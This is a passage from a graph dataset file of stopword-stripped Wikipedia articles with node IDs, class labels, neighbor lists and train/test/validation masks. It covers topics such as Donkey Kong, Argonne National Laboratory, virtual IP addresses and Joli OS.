    "text": "Vigilante_(video_game):vigilante video game game takes place downtown new york city game plot involves lone professional martial artist became vigilante fight evil gang called skinheads ruled man known giant devil order protect turf save female hostage named madonna kidnapped players control titular character using punches kicks defeat skinheads 2d platform manner sometimes picking using nunchaku players get hurt holding nunchuku become unarmed five stages order appearance street junkyard brooklyn bridge back street scene top building construction skinheads mohawk spiked hairdo attack vigilante knives chains motorbikes rifles kinds weapons also cling stands close arcade game later ported several different home computers consoles sega master system version ported arc system works published exclusively north america europe sega one several games console include fm sound switch enhanced music quality sega master system version madonna renamed maria skinheads called rogues ones commodore 64 zx spectrum atari st amiga amstrad cpc reprogrammed emerald software published u.s. gold mostly europe msx version ported published korean company clover turbografx-16 version ported published japan january 14 1989 irem published north america nec year port matches arcade ports turbografx-16 version later re-released globally nintendo virtual console wii north america february 5 2007 japan february 6 2007 europe february 9 2007 australia july 6 2007 delisted march 30 2012 march 31 europe returned september 2013 also released wii u virtual console japan february 10 2015 north america september 14 2017 europe october 5 2017 sinclair summarised game pretty standard beat 'em 've probably seen buy 're addicted genre 've already got better ones",
    "neighbors": [
      8355,
      11557,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 10640,
    "label": 7,
    "text": "Virtual_IP_address:virtual ip address virtual ip address vip vipa ip address n't correspond actual physical network interface uses vips include network address translation especially one-to-many nat fault-tolerance mobility one-to-many nat vip address advertised nat device often router incoming data packets destined vip address routed different actual ip addresses address translation vip addresses several variations implementation scenarios including common address redundancy protocol carp proxy arp addition multiple actual ip addresses load balancing performed part nat vip addresses also used connection redundancy providing alternative fail-over options one machine work host run interior gateway protocol like open shortest path first ospf appear router rest network advertises virtual links connected via actual network interfaces one network interface fails normal ospf topology reconvergence cause traffic sent via another interface vip address used provide nearly unlimited mobility example application ip address physical subnet application moved host subnet vip addresses advertised subnet application moved anywhere reachable network without changing addresses",
    "neighbors": [
      10279,
      3751,
      8969,
      5486,
      6480
    ],
    "mask": "Test"
  },
  {
    "node_id": 10641,
    "label": 3,
    "text": "Argonne_National_Laboratory:argonne national laboratory argonne national laboratory science engineering research national laboratory operated university chicago argonne llc united states department energy located lemont illinois outside chicago largest national laboratory size scope midwest argonne initially formed carry enrico fermi work nuclear reactors part manhattan project designated first national laboratory united states july 1 1946 post-war era lab focused primarily non-weapon related nuclear physics designing building first power-producing nuclear reactors helping design reactors used usa nuclear navy wide variety similar projects 1994 lab nuclear mission ended today maintains broad portfolio basic science research energy storage renewable energy environmental sustainability supercomputing national security uchicago argonne llc operator laboratory brings together expertise university chicago sole member llc jacobs engineering group inc. argonne part expanding illinois technology research corridor argonne formerly ran smaller facility called argonne national laboratory-west simply argonne-west idaho next idaho national engineering environmental laboratory 2005 two idaho-based laboratories merged become idaho national laboratory argonne five main areas focus goals stated doe 2008 consist argonne began 1942 metallurgical laboratory university chicago became part manhattan project met lab built chicago pile-1 world first nuclear reactor stands university chicago sports stadium considered unsafe 1943 cp-1 reconstructed cp-2 today known red gate woods argonne forest cook county forest preserve district near palos hills lab named surrounding argonne forest turn named forest argonne france u.s. troops fought world war i. fermi pile originally going constructed argonne forest construction plans set motion labor dispute brought project halt since speed paramount project moved squash court stagg field football field campus university chicago fermi told sure calculations said would lead runaway reaction would contaminated city activities added argonne next five years july 1 1946 metallurgical laboratory formally re-chartered argonne national laboratory cooperative research nucleonics request u.s. atomic energy commission began developing nuclear reactors nation peaceful nuclear energy program late 1940s early 1950s laboratory moved larger location unincorporated dupage county illinois established remote location idaho called argonne-west conduct nuclear research quick succession laboratory designed built chicago pile 3 1944 world first heavy-water moderated reactor experimental breeder reactor chicago pile 4 built idaho lit string four light bulbs world first nuclear-generated electricity 1951 complete list reactors designed cases built operated argonne viewed reactors designed argonne page knowledge gained argonne experiments conducted reactors 1 formed foundation designs commercial reactors currently used throughout world electric power generation 2 inform current evolving designs liquid-metal reactors future commercial power stations conducting classified research laboratory heavily secured employees visitors needed badges pass checkpoint many buildings classified laboratory fenced guarded alluring secrecy drew visitors authorized—including king leopold iii belgium queen frederica greece—and unauthorized shortly past 1 a.m. february 6 1951 argonne guards discovered reporter paul harvey near perimeter fence coat tangled barbed wire searching car guards found previously prepared four-page broadcast detailing saga unauthorized entrance classified hot zone brought federal grand jury charges conspiracy obtain information national security transmit public indicted nuclear technology went developing reactors however designing scanner reactor fuel elements 1957 argonne physicist william nelson beck put arm inside scanner obtained one first ultrasound images human body remote manipulators designed handle radioactive materials laid groundwork complex machines used clean contaminated areas sealed laboratories caves 1964 janus reactor opened study effects neutron radiation biological life providing research guidelines safe exposure levels workers power plants laboratories hospitals scientists argonne pioneered technique analyze moon surface using alpha radiation launched aboard surveyor 5 1967 later analyzed lunar samples apollo 11 mission addition nuclear work laboratory maintained strong presence basic research physics chemistry 1955 argonne chemists co-discovered elements einsteinium fermium elements 99 100 periodic table 1962 laboratory chemists produced first compound inert noble gas xenon opening new field chemical bonding research 1963 discovered hydrated electron high-energy physics made leap forward argonne chosen site 12.5 gev zero gradient synchrotron proton accelerator opened 1963 bubble chamber allowed scientists track motions subatomic particles zipped chamber 1970 observed neutrino hydrogen bubble chamber first time meanwhile laboratory also helping design reactor world first nuclear-powered submarine u.s.s nautilus steamed 513,550 nautical miles 951,090 km next nuclear reactor model experimental boiling water reactor forerunner many modern nuclear plants experimental breeder reactor ii ebr-ii sodium-cooled included fuel recycling facility ebr-ii later modified test reactor designs including fast-neutron reactor 1982 integral fast reactor concept—a revolutionary design reprocessed fuel reduced atomic waste withstood safety tests failures triggered chernobyl three mile island disasters 1994 however u.s. congress terminated funding bulk argonne nuclear programs argonne moved specialize areas capitalizing experience physics chemical sciences metallurgy 1987 laboratory first successfully demonstrate pioneering technique called plasma wakefield acceleration accelerates particles much shorter distances conventional accelerators also cultivated strong battery research program following major push then-director alan schriesheim laboratory chosen site advanced photon source major x-ray facility completed 1995 produced brightest x-rays world time construction 19 march 2019 reported chicago tribune laboratory constructing world powerful supercomputer costing 500 million processing power 1 quintillion flops applications include analysis stars improvements power grid course history 13 eminent scientists served argonne director argonne builds maintains scientific facilities would expensive single company university construct operate facilities used scientists argonne private industry academia national laboratories international scientific organizations argonne welcomes members public age 16 older take guided tours scientific engineering facilities grounds tours last two half hours children 16 argonne offers range hands-on learning activities suitable k–12 field trips scout outings laboratory also hosts educational science engineering outreach schools surrounding area argonne scientists engineers help advance science engineering mathematics education united states taking part training nearly 1,000 college graduate students post-doctoral researchers every year part research development activities significant portions 1996 chase film chain reaction shot zero gradient synchrotron ring room former continuous wave deuterium demonstrator laboratory",
    "neighbors": [
      512,
      4612,
      5767,
      9095,
      1933,
      11661,
      15,
      1823,
      5283,
      6950,
      1454,
      8502,
      8378,
      9915,
      1480,
      4809,
      7497,
      2135,
      6365,
      4194,
      105,
      3960,
      6906,
      3323,
      7935
    ],
    "mask": "Train"
  },
  {
    "node_id": 10642,
    "label": 2,
    "text": "Pia_Andrews:pia andrews pia andrews née pia smith also formerly known pia waugh born 1979 open government leader executive director digital government new south wales department finance services innovation andrews spearheaded growth australian open government community organising events govhack govcamp events bring together diverse range citizens want see government data made open reuse previously andrews known work australian free software advocate past positions include presidency software freedom international presidency vice-presidency linux australia andrews employed services company volante several years 2005 andrews appointed research co-ordinator australian service knowledge open source software ask-oss project 2006 andrews then-husband jeff waugh director waugh partners australian open source consultancy waugh partners 2007 nsw state pearcey award young achievers work promoting free software australian ict industry project leader member board directors one laptop per child australia program launched 2008 andrews self-taught computer specialist also studied politics tertiary level involved several projects events promoting ict careers children women april 2009 andrews announced appointment policy advisor kate lundy announced role stepping aside leadership advocacy roles community groups would longer work waugh partners november 2012 andrews joined australian government information management office agimo director coordination gov 2.0 technology procurement division finance john sheridan cto australia charge australian national open data site http //data.gov.au/ 2014 andrews recognised innovation named one australia 100 women influence 2014 australian financial review westpac 100 women influence awards andrews included 2018 list world 100 influential people digital government apolitical group august 2018 andrews appointed executive director digital government news south wales australia andrews held several positions free software community",
    "neighbors": [
      1026,
      5644,
      4367,
      8848,
      657,
      1939,
      2581,
      3478,
      6808,
      7450,
      6302,
      7584,
      802,
      5410,
      6691,
      6947,
      8354,
      5931,
      8364,
      1717,
      823,
      2109,
      11069,
      10687,
      10822,
      8263,
      843,
      589,
      6352,
      4177,
      11602,
      8787,
      4437,
      6489,
      3802,
      4831,
      9696,
      11232,
      7793,
      1394,
      1396,
      3189,
      11643
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10643,
    "label": 2,
    "text": "Jeff_Bonwick:jeff bonwick jeff bonwick invented led development zfs file system used oracle corporation zfs storage products well startups including nexenta delphix joyent datto inc. bonwick also inventor slab allocation used many operating systems including macos linux lzjb compression algorithm roles included sun fellow sun storage cto oracle vice president 2010 bonwick co-founded small company called dssd mike shapiro bill moore became chief technical officer co-invented dssd system hardware architecture software developed dssd whole-system simulator enabled team explore possible hardware topologies software algorithms dssd acquired emc corporation 2014 became part dell technologies 2016 end 2016 bill moore left company bonwick remained cto dssd product called d5 cancelled march 2017",
    "neighbors": [
      9665,
      10615,
      2123,
      823,
      1422,
      8599,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 10644,
    "label": 3,
    "text": "Donkey_Kong_(video_game):donkey kong video game game latest series efforts nintendo break north american market hiroshi yamauchi nintendo president time assigned project first-time video game designer named shigeru miyamoto drawing wide range inspirations including popeye beauty beast king kong miyamoto developed scenario designed game alongside nintendo chief engineer gunpei yokoi two men broke new ground using graphics means characterization including cutscenes advance game plot integrating multiple stages gameplay although nintendo american staff initially apprehensive donkey kong succeeded commercially critically north america japan nintendo licensed game coleco developed home console versions numerous platforms companies cloned nintendo hit avoided royalties altogether miyamoto characters appeared cereal boxes television cartoons dozens places lawsuit brought universal city studios later universal studios alleging donkey kong violated trademark king kong ultimately failed success donkey kong nintendo victory courtroom helped position company video game market dominance release 1981 late 1990s following 1980 space panic donkey kong one earliest examples platform game genre even prior term coined u.s. gaming press used climbing game games platforms ladders first platform game feature jumping donkey kong requires player jump gaps obstacles approaching enemies setting template future platform genre four unique stages donkey kong complex arcade game time release one first arcade games feature multiple stages following 1980 phoenix 1981 gorf scramble competitive video gamers referees stress game high level difficulty compared classic arcade games winning game requires patience ability accurately time mario ascent addition presenting goal saving pauline game also gives player score points awarded following leaping obstacles destroying objects hammer power-up collecting items hats parasols purses presumably belonging pauline removing rivets platforms completing stage determined steadily decreasing bonus counter player typically receives three lives bonus awarded 7,000 points although modified via game built dip switches one life lost whenever mario touches donkey kong enemy object falls far gap end platform lets bonus counter reach zero game divided four different single-screen stages represents 25 meters structure donkey kong climbed one stage 25 meters higher previous final stage occurs 100 meters stage one involves mario scaling construction site made crooked girders ladders jumping hammering barrels oil drums tossed donkey kong stage two involves climbing five-story structure conveyor belts transport cement pans third stage involves player riding elevators avoiding bouncing springs fourth final stage requires mario remove eight rivets platforms supporting donkey kong removing final rivet causes donkey kong fall hero reunited pauline four stages combine form level upon completion fourth stage level increments game repeats stages progressive difficulty example donkey kong begins hurl barrels faster sometimes diagonally fireballs speed victory music alternates levels 1 2 fourth level however consists 5 stages final stage 125 meters 22nd level colloquially known kill screen due error game programming kills mario seconds effectively ending game donkey kong considered earliest video game storyline visually unfolds screen eponymous donkey kong character game de facto villain hero carpenter originally unnamed japanese arcade release later named jumpman mario donkey kong kidnaps mario girlfriend originally known lady later renamed pauline player must take role mario rescue first occurrence damsel distress scenario would provide template countless video games come game uses graphics animation vehicles characterization donkey kong smirks upon mario demise pauline pink dress long hair speech balloon crying help appears frequently beside mario depicted red overalls red cap everyman character type common japan graphical limitations low pixel resolution small sprites prompted design drawing mouth pixels infeasible character given mustache programmers could animate hair got cap make arm movements visible needed colored overalls artwork used cabinets promotional materials make cartoon-like character designs even explicit pauline example depicted disheveled like king kong fay wray torn dress stiletto heels donkey kong first example complete narrative told video game form like 1980 pac-man employs cutscenes advance plot game opens gorilla climbing pair ladders top construction site sets pauline stomps feet causing steel beams change shape moves final perch sneers melody plays level stage starts brief animation sets scene adds background gameplay first video games upon reaching end stage another cutscene begins heart appears mario pauline donkey kong grabs climbs higher causing heart break narrative concludes mario reaches end rivet stage pauline reunited short intermission plays gameplay loops beginning higher level difficulty without formal ending late 1980 early 1981 nintendo efforts expand north america failed culminating attempted export otherwise successful radar scope left large number unsold radar scope machines company president hiroshi yamauchi thought simply converting something new approached young industrial designer named shigeru miyamoto working nintendo since 1977 see could design replacement miyamoto said could yamauchi appointed nintendo head engineer gunpei yokoi supervise project nintendo budget development game 100,000 sources also claim ikegami tsushinki involved development played role game creation concept hired provide mechanical programming assistance fix software created nintendo time nintendo also pursuing license make game based popeye comic strip license attempt failed nintendo took opportunity create new characters could marketed used later games miyamoto came many characters plot concepts eventually settled love triangle gorilla carpenter girlfriend mirrors rivalry bluto popeye olive oyl bluto became ape miyamoto said nothing evil repulsive would pet main character funny hang-loose kind guy miyamoto also named beauty beast 1933 film king kong influences although origin comic strip license played major part donkey kong marked first time storyline video game preceded game programming rather simply appended afterthought unrelated popeye games would eventually released nintendo game watch following month arcades 1982 yamauchi wanted primarily target north american market mandated game given english title though many games point english titles anyway miyamoto decided name game ape felt strongest character story miyamoto came name donkey kong varies false urban myth says name originally meant monkey kong misspelled misinterpreted due blurred fax bad telephone connection another credible story claims miyamoto looked japanese-english dictionary something would mean stubborn gorilla donkey meant convey silly stubborn kong common japanese slang gorilla rival claim worked nintendo export manager come title donkey meant represent stupid goofy end miyamoto stated thought name would convey thought stupid ape miyamoto high hopes new project lacked technical skills program alone instead came concepts consulted technicians see possible wanted make characters different sizes move different manners react various ways yokoi thought miyamoto original design complex though difficult suggestions using see-saws catapult hero across screen eventually found hard program though similar concept would appear aforementioned popeye arcade game miyamoto thought using sloped platforms barrels ladders specified game would multiple stages four-man programming team complained essentially asking make game repeatedly nevertheless followed miyamoto design creating total approximately 20 kilobytes content yukio kaneoka composed simple soundtrack serve background music levels story events circuit board radar scope restructured donkey kong radar scope hardware originally inspired namco galaxian hardware designed large number enemies moving around high speeds donkey kong require development team removed unnecessary functions reduced scale circuit board gameplay graphics reworked updated rom chips existing cpu sound hardware monitor left intact character set scoreboard upper hud display font almost identical radar scope palette differences donkey kong hardware memory capacity displaying 128 foreground sprites 16x16 pixels 256 background tiles 8x8 pixels mario moving objects use single sprites taller pauline uses two sprites larger donkey kong uses six sprites hiroshi yamauchi thought game going sell well phoned inform minoru arakawa head nintendo operations u.s. nintendo american distributors ron judy al stone brought arakawa lawyer named howard lincoln secure trademark game sent nintendo america testing sales manager disliked different maze shooter games common time judy lincoln expressed reservations strange title still arakawa adamantly believed would hit american staff began translating storyline cabinet art naming characters chose pauline lady polly james wife nintendo redmond washington warehouse manager james name jumpman name originally chosen similarity popular brands walkman pac-man eventually changed mario likeness mario segale landlord original office space nintendo america character names printed american cabinet art used promotional materials donkey kong ready release stone judy convinced managers two bars seattle washington set donkey kong machines managers initially showed reluctance saw sales 30 day—or 120 plays—for week straight requested units redmond headquarters skeleton crew composed arakawa wife yoko james judy phillips stone set gutting 2,000 surplus radar scope machines converting donkey kong motherboards power supplies japan game officially went sale july 1981 actor harris shore created first live-action mario television advertisements colecovision hand-held donkey kong donkey kong junior video games makers video game consoles also interested taito offered considerable sum buy rights donkey kong nintendo turned three days discussion within company rivals coleco atari approached nintendo japan united states respectively end yamauchi granted coleco exclusive console tabletop rights donkey kong believed hungriest company addition arakawa believed established company u.s. coleco could better handle marketing return nintendo would receive undisclosed lump sum plus 1.40 per game cartridge sold 1 per tabletop unit december 24 1981 howard lincoln drafted contract included language coleco would held liable anything game cartridge unusual clause licensing agreement arakawa signed document next day february 1 1982 yamauchi persuaded coleco representative japan sign without review company lawyers coleco offer game cartridge stand-alone instead bundled colecovision console went sale august 1982 six months later coleco offered atari 2600 intellivision versions company port atari 5200 system comparable opposed less powerful 2600 intellivision coleco sales doubled 500 million earnings quadrupled 40 million coleco console versions donkey kong sold six million cartridges total grossing 153 million earning nintendo 5 million royalties coleco also released stand-alone mini-arcade tabletop versions donkey kong along pac-man galaxian frogger sold three million units combined meanwhile atari got license computer versions donkey kong released atari 400 800 coleco unveiled adam computer running port donkey kong 1983 consumer electronics show chicago illinois atari protested violation licensing agreement yamauchi demanded arnold greenberg coleco president withdraw adam port version game cartridge-based thus violation nintendo license atari still greenberg complied ray kassar atari fired next month home pc version donkey kong released 1983 atari released several computer versions atarisoft label computer ports cement factory level console versions none home versions intermission animations arcade game donkey kong left side screen barrel level arcade game others right side miyamoto created greatly simplified version game watch multiscreen handheld device ports include apple ii atari 7800 intellivision commodore vic-20 famicom disk system ibm pc booter zx spectrum amstrad cpc msx atari 8-bit family mini-arcade versions two separate distinct ports developed commodore 64 first published atarisoft 1983 second ocean software 1986 game ported nintendo family computer famicom console released japan july 15 1983 one system three launch games also early game famicom international redesign nintendo entertainment system nes launched june 1 1986 north america october 15 1986 europe game ported famicom nes developer nintendo research development 2 arcade classics series nes games cement factory level included however cutscenes since initial rom cartridges enough memory available however port includes new song composed yukio kaneoka title screen donkey kong sequel donkey kong jr. included 1988 nes compilation donkey kong classics complete remake original arcade game game boy titled donkey kong referred donkey kong '94 development contains levels original donkey kong donkey kong jr. arcades starts damsel-in-distress premise four basic locations arcade game progresses 97 additional puzzle-based levels first game built-in enhancement super game boy accessory nes version re-released unlockable game animal crossing gamecube also published virtual console wii wii u nintendo 3ds wii u version also last game released celebrate 30-year anniversary japanese version nes famicom original arcade version game appears nintendo 64 game donkey kong 64 must beaten finish game nintendo released nes version e-reader game boy advance classic nes series 2002 2004 respectively 2004 namco released arcade cabinet contains donkey kong donkey kong jr. mario bros. donkey kong original edition port based nes version reinstates cement factory stage includes intermission animations absent original nes version ever released virtual console preinstalled 25th anniversary pal region red wii systems first released europe october 29 2010 japan download code game nintendo 3ds virtual console sent users purchased new super mario bros. 2 nintendo eshop july 28 september 2 2012 north america download code game nintendo 3ds virtual console sent users purchased one five select 3ds games nintendo eshop registered club nintendo october 1 2012 january 6 2013 europe australia released purchase nintendo 3ds eshop released september 18 2014 europe september 19 2014 australia original arcade version re-released part arcade archives series nintendo switch june 14 2018 nes version re-released one launch titles nintendo switch online september 19 2018 1982 book video invaders steve bloom described donkey kong another bizarre cartoon game courtesy japan donkey kong however extremely popular united states canada game initial 2,000 units sold orders made arakawa began manufacturing electronic components redmond waiting shipments japan taking long october donkey kong selling 4,000 units month late june 1982 nintendo sold 60,000 donkey kong machines overall earned 180 million judy stone worked straight commission became millionaires arakawa used nintendo profits buy land redmond july 1982 nintendo earned another 100 million game second year release totaling 280 million remained nintendo top seller mid-1983 donkey kong also sold steadily japan electronic games speculated june 1983 game home versions contributed arcade version extended popularity compared four six months average game lasted january 1983 1982 arcade awards gave best single-player video game award certificate merit runner-up coin-op game year ed driscoll reviewed atari vcs version donkey kong space gamer 59 edwards commented faults really outweigh plusses especially 've got 'donkey kong fever addicted cure lies elsewhere still play game occasionally never may like cartridge however play store copy try friend buy september 1982 arcade express reviewed colecovision port scored 9 10 creative computing video arcade games 1983 stated coleco fabulous job donkey kong best console first five games faithful adaptation original video game seen magazine danny goodman stated coleco three console versions one colecovision best followed surprisingly atari intellivision order computer video games reviewed colecovision port september 1984 issue scored 4 4 four categories action graphics addiction theme famicom version game sold 840,000 units japan april 1982 sid sheinberg seasoned lawyer president mca universal city studios learned game success suspected might trademark infringement universal king kong april 27 1982 met arnold greenberg coleco threatened sue coleco home version donkey kong coleco agreed may 3 1982 pay royalties universal 3 donkey kong net sale price worth 4.6 million meanwhile sheinberg revoked tiger license make king kong game o. r. rissman refused acknowledge universal claim trademark universal threatened nintendo howard lincoln nintendo refused cave preparation court battle ahead universal agreed allow tiger continue producing king kong game long distinguished donkey kong universal sued nintendo june 29 1982 announced license coleco company sent cease desist letters nintendo licensees agreed pay royalties universal except milton bradley ralston purina universal city studios inc. v. nintendo co. ltd. heard united states district court southern district new york judge robert w. sweet seven days universal counsel new york firm townley updike argued names king kong donkey kong easily confused plot game infringement films nintendo counsel john kirby countered universal argued previous case king kong scenario characters public domain judge sweet ruled nintendo favor awarding company universal profits tiger game 56,689.41 damages attorney fees universal appealed trying prove consumer confusion presenting results telephone survey examples print media people allegedly assumed connection two kongs october 4 1984 however court upheld previous verdict nintendo licensees filed counterclaims universal may 20 1985 judge sweet awarded nintendo 1.8 million legal fees lost revenues expenses however denied nintendo claim damages licensees paid royalties nintendo universal parties appealed judgment verdict upheld july 15 1986 nintendo thanked john kirby gift 30,000 sailboat named donkey kong exclusive worldwide rights use name sailboats later nintendo protagonist named kirby honor court battle also taught nintendo could compete larger entertainment industry companies 1996 next generation listed arcade atari 7800 cancelled coleco adam versions number 50 top 100 games time commenting even ignoring massive historical significance donkey kong stands great game due demanding challenges graphics manage elegantly delineate entire scenario single screen february 2006 nintendo power rated 148th best game made nintendo system today donkey kong fifth popular arcade game among collectors donkey kong inspiration 1983 platform game home computers jumpman according game creator super smash bros. brawl features music game arranged hirokazu hip tanaka stage called 75m almost exact replica donkey kong namesake stage contains items pauline missing perch top stage crazy kong officially licensed nintendo manufactured falcon non-us markets nevertheless crazy kong machines found way american arcades often installed cabinets marked congorilla nintendo quick take legal action distributing game us bootleg copies donkey kong also appeared north america france crazy kong konkey kong donkey king names 1982 logger arcade game century electronics direct clone donkey kong large bird standing ape rolling logs instead barrels 1981 o. r. rissman president tiger electronics obtained license use name king kong universal city studios title tiger created handheld game scenario gameplay based directly nintendo creation many home computer clones directly borrowed gorilla theme killer gorilla bbc micro 1983 killer kong zx spectrum 1983 crazy kong 64 commodore 64 1983 kongo kong commodore 64 1983 donkey king trs-80 color computer 1983 kong ti-99/4a 1983 one first releases electronic arts hard hat mack apple ii 1983 three-stage game without ape using construction site setting donkey kong clones recast game different characters cannonball blitz apple ii 1982 soldier cannonballs replacing ape barrels american southwest-themed canyon climber atari 8-bit 1982 epyx jumpman atari 8-bit 1983 reuses prototypical name mario character donkey kong magazine ad game tagline liked donkey kong 'll love jumpman jumpman along miner 2049er atari 8-bit 1982 mr robot robot factory atari 8-bit 1984 focuses traversing platforms level collecting scattered objects instead climbing top many games multiple ladder platforms stages 1983 electronic games described nintendo popeye game yet another variation theme become familiar since success donkey kong year sega released donkey kong clone called congo bongo arcades although using isometric perspective structure gameplay similar atari 8-bit computer port donkey kong contains one longest-undiscovered easter eggs video game programmer landon dyer initials appear player died certain conditions returned title screen remained undiscovered 26 years dyer revealed blog stating easter egg totally worth n't remember bring anyway steps required trigger later discovered hodges used emulator debugger trace game code donkey kong spawned sequel donkey kong jr. 1982 player controlling donkey kong son attempt save father now-evil mario 1983 spinoff mario bros. introduced mario brother luigi single-screen cooperative game set sewer launched mario franchise also 1983 donkey kong 3 appeared form fixed shooter exterminator ridding ape—and insects—from greenhouse nintendo revived donkey kong franchise 1990s series platform games spin-offs developed rare beginning donkey kong country 1994 2004 nintendo released mario vs. donkey kong sequel game boy donkey kong mario must chase donkey kong get back stolen mini-mario toys follow-up donkey kong falls love pauline kidnaps mario uses mini-mario toys help rescue donkey kong racing gamecube development rare canceled microsoft purchased company 2004 nintendo released first donkey konga games rhythm-based game series uses special bongo controller donkey kong jungle beat 2005 unique platform action game uses bongo controller accessory 2007 donkey kong barrel blast released nintendo wii originally developed gamecube game would used bongo controller delayed released exclusively wii game support bongo accessory donkey kong appears game wii u game nes remix features multiple nes games sometimes remixes presenting significantly modified versions games challenges one challenge features link legend zelda traveling first screen save pauline difficulty increased compared original donkey kong link jump zelda late june 1982 donkey kong success prompted 50 parties u.s. japan license game characters mario simian nemesis appeared cereal boxes board games pajamas manga 1983 animation studio ruby-spears produced donkey kong cartoon well donkey kong jr. saturday supercade program cbs show mystery crime-solving plots mode scooby-doo framed around premise mario pauline chasing donkey kong voiced soupy sales escaped circus show lasted two seasons since original release donkey kong success entrenched game american popular culture 1982 buckner garcia r. cade video victims recorded songs donkey kong donkey kong respectively based game artists like dj jazzy jeff fresh prince trace adkins referenced game songs episodes television series simpsons futurama crank yankers fairly oddparents also contained references game even today sound effects atari 2600 version often serve generic video game sounds films television series phrase like donkey kong used various works popular culture november 2010 nintendo applied trademark phrase united states patent trademark office billy mitchell considered hold donkey kong record 1982 august 2000 surpassed tim sczerby 2007 documentary tells story steve wiebe attempts break donkey kong world record early 2010s hank chien set new record 1,138,600 broken four years later robbie lakeman current world record set robbie lakeman february 2 2018 score 1,247,700 2018 mitchell stripped records twin galaxies banned submitting new scores twin galaxies concluded mitchell illicitly used emulators achieve scores twin galaxies prohibits use emulators high scores publish allow undetectable cheating",
    "neighbors": [
      9006,
      7151,
      1776,
      10287,
      6546,
      7283,
      10576,
      7734,
      4312,
      3039
    ],
    "mask": "Test"
  },
  {
    "node_id": 10645,
    "label": 2,
    "text": "Google_Goggles:google goggles google goggles image recognition mobile app developed google used searches based pictures taken handheld devices example taking picture famous landmark searches information taking picture product barcode would search information product google goggles developed use google android operating system mobile devices initially available beta version android phones google announced plans enable software run platforms notably iphone blackberry devices google discuss non-handheld format google product manager shailesh nalawadi indicated google wanted goggles application platform much like google maps single product october 5 2010 google announced availability google goggles devices running ios 4.0 may 2014 update google mobile ios google goggles feature removed google i/o 2017 similar app google lens announced similar functions goggles uses google assistant app officially discontinued august 20 2018 last update directing users download google lens google photos upon launching app system could identify various labels landmarks allowing users learn items without needing text-based search system could identify products barcodes labels allow users search similar products prices save codes future reference similar cuecat late 1990s system also recognized printed text uses optical character recognition ocr produce text snippet cases even translate snippet another language metropolitan museum art announced december 2011 collaboration google use google goggles providing information artworks museum direct links website metropolitan museum art",
    "neighbors": [
      4096,
      9732,
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      10284,
      5677,
      3633,
      1083,
      6212,
      69,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8285,
      2658,
      8821,
      11391,
      1670,
      7816,
      5262,
      6800,
      11408,
      10393,
      8858,
      7835,
      2208,
      673,
      7841,
      8870,
      1191,
      1203,
      7359,
      196,
      3269,
      3782,
      8907,
      10445,
      3795,
      1240,
      8413,
      9949,
      6367,
      5857,
      1255,
      236,
      8940,
      9970,
      7926,
      3836,
      5892,
      7428,
      8455,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      7983,
      3380,
      5431,
      2875,
      3900,
      10045,
      11590,
      11592,
      11082,
      332,
      9039,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      7548,
      1409,
      4995,
      9610,
      10129,
      5522,
      1427,
      5524,
      1435,
      2978,
      1959,
      937,
      5546,
      3499,
      6057,
      7595,
      4044,
      4048,
      2001,
      479,
      6632,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10646,
    "label": 7,
    "text": "Joli_OS:joli os joli os ubuntu-based linux distribution developed french company jolicloud also name operating system version 1.2 joli os open source project source code hosted github 22 november 2013 developers decided discontinue joli os keep source code open jolicloud discontinued april 1 2016 project launched 2008 netvibes founder tariq krim romain huet krim originally wanted build laptop using environmentally friendly manufacturing methods two co-founders refocused effort building operating system purchasing netbooks renewing acquaintance linux rented office space montorgueil area paris later joined another developer tristan groléat alpha version built help developers kernel hackers designers venture capital firms atomico ventures mangrove capital partners provided 4.2 million funding version 1.0 released july 2010 version 1.1 released 7 december 2010 version 1.2 released 9 march 2011 joli os beginning built top ubuntu netbook edition linux distribution tweaked netbooks computers limited disk storage memory screen size joli os built top ubuntu customized kernel joli os designed easy installation wi-fi bluetooth 3g modem support included operating system supports major netbooks including models asus acer dell hp msi samsung sony jolicloud claims os supports 98 netbooks out-of-the-box compatibility also works large number devices 10 years old laptops desktops tablets version 1.0 operating system incorporates user interface built primarily html5 includes application launcher library compatible applications one-click installation removal display machines associated user account social activity stream enables users compare installed applications launcher displays applications supported library identical configuration viewed machine running joli os account management available computer html5-compatible browser jolicloud html5 implementation chromium web browser serves middleware web rendering reviewers evaluating joli os differed appraisals depending whether writing user new linux experienced operating system writing condé nast traveler blog mike haney called joli os easy free os n't code-monkey install everything need netbook quickly put lenovo netbook weekend running like molasses windows 7 'm convert joli os first operating system designed linux targeted beginning netbooks first n't feel like 're using linux funky install procedures code accessing special directories find apps compared joli os look function ios operating system used apple ipad well iphone ipod touch though folders files conventional computer computerworld serdar yegulalp wrote joli os 1.0 feels like second beta 1.0 release needs work truly useful instead one step curiosity yegulalp reported problems launching applications including google chrome browser vlc media player inability peer-to-peer mesh networking power button getting blocked open windows hibernation mode even computer supports noted comparable performance windows 7 slightly faster boot times zdnet reporter david meyer disagreed performance assessment running jolicloud nokia booklet 3g order take advantage device unusual 720p screen resolution wrote device lousy atom z530 processor ... really struggles windows 7 starter edition flies jolicloud ... 'm struggling think rival linux distro easily picked run average user ars technica ryan paul wrote lot good ideas display jolicloud joli os 1.0 nascent product still feels incomplete saw reason linux users particularly ubuntu users switch ubuntu unity environment sophisticated much better integration native applications underlying platform though joli os might better choice users interested web applications noting joli os 1.0 foundation ubuntu 9.04 nearing end support cycle canonical paul wrote real challenge continuing expand scope joli os differentiating features ... ensuring jolicloud users benefit ubuntu steady stream new features tariq krim defended decision stay ubuntu 9.04 joli os 1.0 arguing later ubuntu versions less stable required user-initiated software installations fully functional examples jolicloud developers additional work ensure out-of-the-box functionality include support poulsbo gma500 drivers touchscreens 3g said company moving away ubuntu solution could fit user needs better looking closely chrome os november 2010 jolicloud shipped netbook computer called jolibook ran operating system box computer manufactured uk-based vye computers featured 10.1-inch screen dual core 1.5 ghz intel atom n550 1gb ram 250gb hard drive artwork lid included slogan fast fun connected machine available united kingdom selling £280 via shop.vyepc.com amazon.co.uk longer manufactured jolicloud released version 1.1 december 2010 new version based ubuntu 10.04 lts lucid future patches planned 10.10 maverick among improvements claimed company faster boot times 10–20 seconds devices tested 15 